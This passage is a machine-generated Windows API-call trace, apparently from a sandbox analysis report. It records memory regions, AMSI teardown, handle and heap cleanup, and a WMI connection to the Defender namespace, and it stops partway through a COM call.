region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3116 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3117 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3118 start_va = 0x1a970000 end_va = 0x1a97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a970000" filename = "" Region: id = 3119 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3120 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3121 start_va = 0x1a970000 end_va = 0x1a97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a970000" filename = "" Region: id = 3122 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3123 start_va = 0x1a970000 end_va = 0x1a9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a970000" filename = "" Region: id = 3124 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3125 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3126 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3127 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3128 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3129 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3130 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3131 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3132 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3133 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3134 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3135 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3136 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3137 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Thread: id = 208 os_tid = 0x438 [0312.699] AmsiCloseSession () returned 0x7fffb444c2b0 [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x348 [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x87c [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6b8 [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6bc [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x24c [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5c8 [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x880 [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x888 [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x88c [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x890 [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x894 [0312.699] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x898 [0312.700] SetEvent (hEvent=0x6bc) returned 1 [0312.700] SetEvent (hEvent=0x348) returned 1 [0312.700] SetEvent (hEvent=0x87c) returned 1 [0312.700] SetEvent (hEvent=0x6b8) returned 1 [0312.700] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x89c [0312.700] SetEvent (hEvent=0x710) returned 1 [0312.708] SetEvent (hEvent=0x24c) returned 1 [0312.708] SetEvent (hEvent=0x5c8) returned 1 [0312.708] SetEvent (hEvent=0x880) returned 1 [0312.716] AmsiCloseSession () returned 0x7fffb444c2b0 [0312.718] AmsiUninitialize () returned 0x1 [0312.773] CoCreateGuid (in: pguid=0xccb88 | out: pguid=0xccb88*(Data1=0xc69037b8, Data2=0x3b0, Data3=0x4a7c, Data4=([0]=0x85, [1]=0x96, [2]=0xaa, [3]=0x67, [4]=0xe5, [5]=0x51, [6]=0x8d, [7]=0xf0))) returned 0x0 [0312.777] ReportEventW (hEventLog=0x1a861c70, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2854da0*="Stopped", lpRawData=0x2854c08) returned 1 [0312.779] SetEvent (hEvent=0x710) returned 1 [0312.816] CloseHandle (hObject=0x710) returned 1 [0312.816] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0312.819] CoGetContextToken (in: pToken=0xcf930 | out: pToken=0xcf930) returned 0x0 [0312.819] CObjectContext::QueryInterface () returned 0x0 [0312.819] CObjectContext::GetCurrentThreadType () returned 0x0 [0312.819] Release () returned 0x0 [0312.820] CoGetContextToken (in: pToken=0xcf3e0 | out: pToken=0xcf3e0) returned 0x0 [0312.820] CObjectContext::QueryInterface () returned 0x0 [0312.820] CObjectContext::GetCurrentThreadType () returned 0x0 [0312.820] Release () returned 0x0 [0312.822] CoGetContextToken (in: pToken=0xcf3e0 | out: pToken=0xcf3e0) returned 0x0 [0312.822] CObjectContext::QueryInterface () returned 0x0 [0312.822] CObjectContext::GetCurrentThreadType () returned 0x0 [0312.822] Release () returned 0x0 [0312.880] CoGetContextToken (in: pToken=0xcf3e0 | out: pToken=0xcf3e0) returned 0x0 [0312.880] CObjectContext::QueryInterface () returned 0x0 [0312.880] CObjectContext::GetCurrentThreadType () returned 0x0 [0312.880] Release () returned 0x0 [0312.917] CoGetContextToken (in: pToken=0xcf400 | out: pToken=0xcf400) returned 0x0 [0312.917] CObjectContext::QueryInterface () returned 0x0 [0312.917] CObjectContext::GetCurrentThreadType () returned 0x0 [0312.917] Release () returned 0x0 [0312.917] CoUninitialize () [0312.920] free (_Block=0x1aa108c0) Thread: id = 215 os_tid = 0x13a4 Thread: id = 216 os_tid = 0x1304 Thread: id = 217 os_tid = 0x1360 [0264.991] CertFreeCertificateContext (pCertContext=0x1a8df850) returned 1 [0264.991] RegCloseKey (hKey=0x70c) returned 0x0 [0264.991] CertFreeCertificateContext (pCertContext=0x1a8e0650) returned 1 [0264.991] CertFreeCertificateContext (pCertContext=0x1a8e05d0) returned 1 [0264.991] CertFreeCertificateContext (pCertContext=0x1a8e0950) returned 1 [0272.010] CertFreeCertificateContext (pCertContext=0x1ad08c20) returned 1 [0272.030] CertFreeCertificateContext (pCertContext=0x1ad09fa0) returned 1 [0276.545] CertFreeCertificateContext (pCertContext=0x1ad08b20) returned 1 [0276.545] CertFreeCertificateContext (pCertContext=0x1ad09e20) returned 1 [0276.545] CertFreeCertificateContext (pCertContext=0x1ad0a020) returned 1 [0276.545] CertFreeCertificateContext (pCertContext=0x1ad09b20) returned 1 [0276.547] CertFreeCertificateContext (pCertContext=0x1ad08da0) returned 1 [0276.547] CertFreeCertificateContext (pCertContext=0x1ad08ba0) returned 1 [0276.547] CertFreeCertificateContext (pCertContext=0x1ad08fa0) returned 1 [0276.547] CertFreeCertificateContext (pCertContext=0x1ad08c20) returned 1 [0278.674] CertFreeCertificateContext (pCertContext=0x1ad0a320) returned 1 [0278.674] CertFreeCertificateContext (pCertContext=0x1ad08ba0) returned 1 [0278.674] CertFreeCertificateContext (pCertContext=0x1ad0a020) returned 1 [0278.674] CertFreeCertificateContext (pCertContext=0x1ad08c20) returned 1 [0309.221] free (_Block=0x818cd0) [0309.222] CloseHandle (hObject=0x278) returned 1 [0312.365] CloseHandle (hObject=0x6b8) returned 1 [0312.366] CloseHandle (hObject=0x87c) returned 1 [0312.821] EtwEventUnregister () returned 0x0 [0312.821] EtwEventUnregister () returned 0x0 [0312.821] EtwEventUnregister () returned 0x0 [0312.821] EtwEventUnregister () returned 0x0 [0312.821] EtwEventUnregister () returned 0x0 [0312.821] EtwEventUnregister () returned 0x0 [0312.821] EtwEventUnregister () returned 0x0 [0312.846] LocalFree (hMem=0x1a8bc0c0) returned 0x0 [0312.846] LocalFree (hMem=0x1a8bb840) returned 0x0 [0312.847] GetModuleHandleA (lpModuleName="kernelbase.dll") returned 0x7fffca790000 [0312.847] GetProcAddress (hModule=0x7fffca790000, lpProcName="DecodePointer") returned 0x7fffcca9c8b0 [0312.848] LocalFree (hMem=0x1a8ba740) returned 0x0 [0312.848] MI_Helpers_SetClrIsShuttingDown () returned 0x0 [0312.859] EtwEventUnregister () returned 0x0 [0312.863] CloseHandle (hObject=0x648) returned 1 [0312.879] UnmapViewOfFile (lpBaseAddress=0x2040000) returned 1 [0312.880] DeregisterEventSource (hEventLog=0x1a861c70) returned 1 [0312.881] CloseHandle (hObject=0x6b8) returned 1 [0312.882] malloc (_Size=0x20) returned 0x1a9f1f10 [0312.882] GetCurrentThread () returned 0xfffffffffffffffe [0312.882] MI_Helpers_GetCurrentSecurityToken () returned 0x0 [0312.883] SetThreadToken (Thread=0x203f498*=0xfffffffffffffffe, Token=0x0) returned 1 [0312.883] GetAddr_SessionHandle_OnReleaseHandleCompleted () returned 0x7fffbb531ed0 [0312.883] PublishDebugMessage () returned 0x1 [0312.884] GetProcessHeap () returned 0x530000 [0312.884] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x50) returned 0x1ad6b920 [0312.884] GetProcessHeap () returned 0x530000 [0312.884] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace6c70) returned 1 [0312.884] GetProcessHeap () returned 0x530000 [0312.884] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad521f0) returned 1 [0312.884] GetProcessHeap () returned 0x530000 [0312.885] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad4fd60) returned 1 [0312.885] GetProcessHeap () returned 0x530000 [0312.885] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad4f2e0) returned 1 [0312.885] SetEvent (hEvent=0x7fc) returned 1 [0312.885] GetProcessHeap () returned 0x530000 [0312.885] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x50) returned 0x1ad6ac00 [0312.885] GetProcessHeap () returned 0x530000 [0312.886] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad527e0) returned 1 [0312.886] GetProcessHeap () returned 0x530000 [0312.886] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad4f660) returned 1 [0312.887] SetEvent (hEvent=0x7fc) returned 1 [0312.887] GetProcessHeap () returned 0x530000 [0312.887] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace8510) returned 1 [0312.887] GetProcessHeap () returned 0x530000 [0312.887] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace87f0) returned 1 [0312.887] GetProcessHeap () returned 0x530000 [0312.887] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1acedc40) returned 1 [0312.887] ?DeInitialize@WMISchema@@QEAAJXZ () returned 0x0 [0312.888] ClassCache_Delete () returned 0x0 [0312.888] CloseHandle (hObject=0x7f0) returned 1 [0312.888] GetProcessHeap () returned 0x530000 [0312.888] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace8970) returned 1 [0312.888] PublishDebugMessage () returned 0x1 [0312.888] PublishDebugMessage () returned 0x1 [0312.888] GetProcessHeap () returned 0x530000 [0312.888] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace5490) returned 1 [0312.888] GetProcessHeap () returned 0x530000 [0312.888] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace8530) returned 1 [0312.888] GetProcessHeap () returned 0x530000 [0312.889] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad06a50) returned 1 [0312.889] GetProcessHeap () returned 0x530000 [0312.890] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad07650) returned 1 [0312.890] ??1WMISchema@@UEAA@XZ () returned 0x0 [0312.890] GetProcessHeap () returned 0x530000 [0312.890] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1a830300) returned 1 [0312.890] PublishDebugMessage () returned 0x1 [0312.890] SetThreadToken (Thread=0x203f498*=0xfffffffffffffffe, Token=0x0) returned 1 [0312.891] MI_ApplicationWrapper_SetAppDomainIsUnloading () returned 0x0 [0312.892] MI_ApplicationWrapper_ScheduleCleanupCallback () returned 0x3 [0312.892] CloseHandle (hObject=0x87c) returned 1 [0312.892] CloseHandle (hObject=0x348) returned 1 [0312.893] CloseHandle (hObject=0x89c) returned 1 [0312.893] CloseHandle (hObject=0x898) returned 1 [0312.899] CloseHandle (hObject=0x5e4) returned 1 [0312.899] CloseHandle (hObject=0x894) returned 1 [0312.899] CloseHandle (hObject=0x890) returned 1 [0312.900] CloseHandle (hObject=0x88c) returned 1 [0312.900] CloseHandle (hObject=0x888) returned 1 [0312.901] CloseHandle (hObject=0x880) returned 1 [0312.901] CloseHandle (hObject=0x640) returned 1 [0312.901] CloseHandle (hObject=0x63c) returned 1 [0312.902] CloseHandle (hObject=0x708) returned 1 [0312.902] CloseHandle (hObject=0x704) returned 1 [0312.902] CloseHandle (hObject=0x700) returned 1 [0312.903] CloseHandle (hObject=0x6fc) returned 1 [0312.904] LocalFree (hMem=0x1a828a40) returned 0x0 [0312.904] CloseHandle (hObject=0x6f8) returned 1 [0312.904] CloseHandle (hObject=0x6f4) returned 1 [0312.905] CloseHandle (hObject=0xb8) returned 1 [0312.905] CloseHandle (hObject=0x6f0) returned 1 [0312.905] CloseHandle (hObject=0x6ec) returned 1 [0312.906] CloseHandle (hObject=0x6e8) returned 1 [0312.906] CloseHandle (hObject=0x6e4) returned 1 [0312.906] CloseHandle (hObject=0x6e0) returned 1 [0312.906] CloseHandle (hObject=0x6d8) returned 1 [0312.907] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0312.907] CloseHandle (hObject=0x6b4) returned 1 [0312.908] LocalFree (hMem=0x1a83e800) returned 0x0 [0312.908] CloseHandle (hObject=0x5c8) returned 1 [0312.909] CloseHandle (hObject=0x24c) returned 1 [0312.910] CloseHandle (hObject=0x7c0) returned 1 [0312.910] CloseHandle (hObject=0x7bc) returned 1 [0312.910] CloseHandle (hObject=0x7b8) returned 1 [0312.910] CloseHandle (hObject=0x79c) returned 1 [0312.911] CloseHandle (hObject=0x794) returned 1 [0312.911] CloseHandle (hObject=0x6bc) returned 1 [0312.911] CloseHandle (hObject=0x7c4) returned 1 [0312.916] CoGetContextToken (in: pToken=0x203f3e0 | out: pToken=0x203f3e0) returned 0x0 [0312.916] CoGetContextToken (in: pToken=0x203f2d0 | out: pToken=0x203f2d0) returned 0x0 [0312.916] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x2 [0312.916] Release () returned 0x1 Thread: id = 218 os_tid = 0xf70 Thread: id = 219 os_tid = 0x588 [0288.674] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7fffbdc39d10, phModule=0x1a5cfbe8 | out: phModule=0x1a5cfbe8*=0x7fffbdc30000) returned 1 [0288.674] TpCallbackUnloadDllOnCompletion () returned 0x7fffbdc2ffff [0288.674] PublishDebugMessage () returned 0x1 [0288.674] GetCurrentThreadId () returned 0x588 [0288.674] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0288.674] GetCurrentThreadId () returned 0x588 [0288.675] GetProcessHeap () returned 0x530000 [0288.675] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x1ace6240 [0288.675] PublishDebugMessage () returned 0x1 [0288.675] CoCreateInstance (in: rclsid=0x7fffbdc55448*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffbdc55468*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1a5cf8d0 | out: ppv=0x1a5cf8d0*=0x1ace6bd0) returned 0x0 [0288.693] WbemLocator:IUnknown:AddRef (This=0x1ace6bd0) returned 0x2 [0288.693] WbemLocator:IUnknown:AddRef (This=0x1ace6bd0) returned 0x3 [0288.693] WbemLocator:IUnknown:Release (This=0x1ace6bd0) returned 0x2 [0288.693] GetProcessHeap () returned 0x530000 [0288.693] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x1a843150 [0288.693] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409 [0288.693] _vsnwprintf (in: _Buffer=0x1a5cfa08, _BufferCount=0x9, _Format="MS_%x", _ArgList=0x1a5cf8e8 | out: _Buffer="MS_409") returned 6 [0288.695] SetThreadToken (Thread=0x0, Token=0x7f0) returned 1 [0288.695] GetCurrentThreadId () returned 0x588 [0288.695] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ace6bd0, strNetworkResource="root/Microsoft/Windows/Defender", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1a5cf968 | out: ppNamespace=0x1a5cf968*=0x1a8cadd0) returned 0x0 [0289.236] CoSetProxyBlanket (pProxy=0x1a8cadd0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0xffffffff, pServerPrincName=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x40) returned 0x0 [0289.236] GetProcessHeap () returned 0x530000 [0289.236] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x1ad521f0 [0289.236] GetProcessHeap () returned 0x530000 [0289.236] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x30) returned 0x1ad4fd60 [0289.236] WbemLocator:IUnknown:AddRef (This=0x1a8cadd0) returned 0x2 [0289.236] GetProcessHeap () returned 0x530000 [0289.236] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1a843150) returned 1 [0289.236] PublishDebugMessage () returned 0x1 [0289.236] WbemLocator:IUnknown:Release (This=0x1ace6bd0) returned 0x1 [0289.237] CoCreateInstance (in: rclsid=0x7fffbdc55498*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffbdc554a8*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x1a81ac38 | out: ppv=0x1a81ac38*=0x1a866580) returned 0x0 [0289.240] OperationOptions_CopyOptions () returned 0x0 [0289.283] ResolveDelayLoadedAPI () returned 0x7fffcb3eb0f0 [0289.285] WbemContext:IWbemContext:SetValue (This=0x1a866580, wszName="__MI_OPERATIONOPTIONS_CLIENTIDENTITY", lFlags=0, pValue=0x1a5cfa68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WMIDCOM", varVal2=0x0)) returned 0x0 [0289.285] OptionsValueToContextValue () returned 0x0 [0289.285] OptionsValueToContextValue () returned 0x0 [0289.285] WbemContext:IWbemContext:SetValue (This=0x1a866580, wszName="__MI_CallbackRegistration", lFlags=0, pValue=0x1a5cfa78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f, varVal2=0x0)) returned 0x0 [0289.285] SetCorrelationIdToWbemContext () returned 0x0 [0289.285] PublishDebugMessage () returned 0x1 [0289.285] CContextSwitcher::ContextCallback () returned 0x0 [0289.286] GetProcessHeap () returned 0x530000 [0289.286] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc8) returned 0x1a80f260 [0289.286] GetProcessHeap () returned 0x530000 [0289.286] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x1ace7190 [0289.286] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fffcbe91a68, pUnk=0x1a80f260, riid=0x7fffbdc4a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x1a5cfa70 | out: pdwCookie=0x1a5cfa70*=0x201) returned 0x0 [0289.286] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a80f260) returned 0x2 [0289.286] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dc40*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1a5cf028 | out: ppvObject=0x1a5cf028*=0x0) returned 0x80004002 [0289.286] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a80f260) returned 0x3 [0289.286] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dc50*(Data1=0x39, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a5cef40 | out: ppvObject=0x1a5cef40*=0x0) returned 0x80004002 [0289.286] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dbe0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a5cef20 | out: ppvObject=0x1a5cef20*=0x0) returned 0x80004002 [0289.286] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1de38*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1a5cef28 | out: ppvObject=0x1a5cef28*=0x0) returned 0x80004002 [0289.286] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dce8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a5cef38 | out: ppvObject=0x1a5cef38*=0x0) returned 0x80004002 [0289.286] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x2 [0289.287] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a80f260) returned 0x3 [0289.287] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x2 [0289.288] StdGlobalInterfaceTable:IGlobalInterfaceTable:GetInterfaceFromGlobal (in: This=0x7fffcbe91a68, dwCookie=0x201, riid=0x7fffbdc55478*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppv=0x1a5cfa10 | out: ppv=0x1a5cfa10*=0x1ad5bd58) returned 0x0 [0289.288] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dbe0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a5cf148 | out: ppvObject=0x1a5cf148*=0x0) returned 0x80004002 [0289.288] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dcd8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a5cf040 | out: ppvObject=0x1a5cf040*=0x1a80f260) returned 0x0 [0289.288] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a80f260) returned 0x4 [0289.288] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a80f260) returned 0x5 [0289.288] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1a888*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a5ce9c8 | out: ppvObject=0x1a5ce9c8*=0x0) returned 0x80004002 [0289.288] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a5ce9d8 | out: ppvObject=0x1a5ce9d8*=0x0) returned 0x80004002 [0289.288] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1a8a8*(Data1=0x40, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a5ce990 | out: ppvObject=0x1a5ce990*=0x0) returned 0x80004002 [0289.288] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a5ce9e0 | out: ppvObject=0x1a5ce9e0*=0x0) returned 0x80004002 [0289.288] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1de38*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1a5ce9c0 | out: ppvObject=0x1a5ce9c0*=0x0) returned 0x80004002 [0289.288] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a5ce9e8 | out: ppvObject=0x1a5ce9e8*=0x0) returned 0x80004002 [0289.288] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1a848*(Data1=0x77dd1250, Data2=0x139c, Data3=0x2bc3, Data4=([0]=0xbd, [1]=0x95, [2]=0x90, [3]=0xa, [4]=0xce, [5]=0xd6, [6]=0x1b, [7]=0xe5)), ppvObject=0x1a5ce9b8 | out: ppvObject=0x1a5ce9b8*=0x0) returned 0x80004002 [0289.288] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, 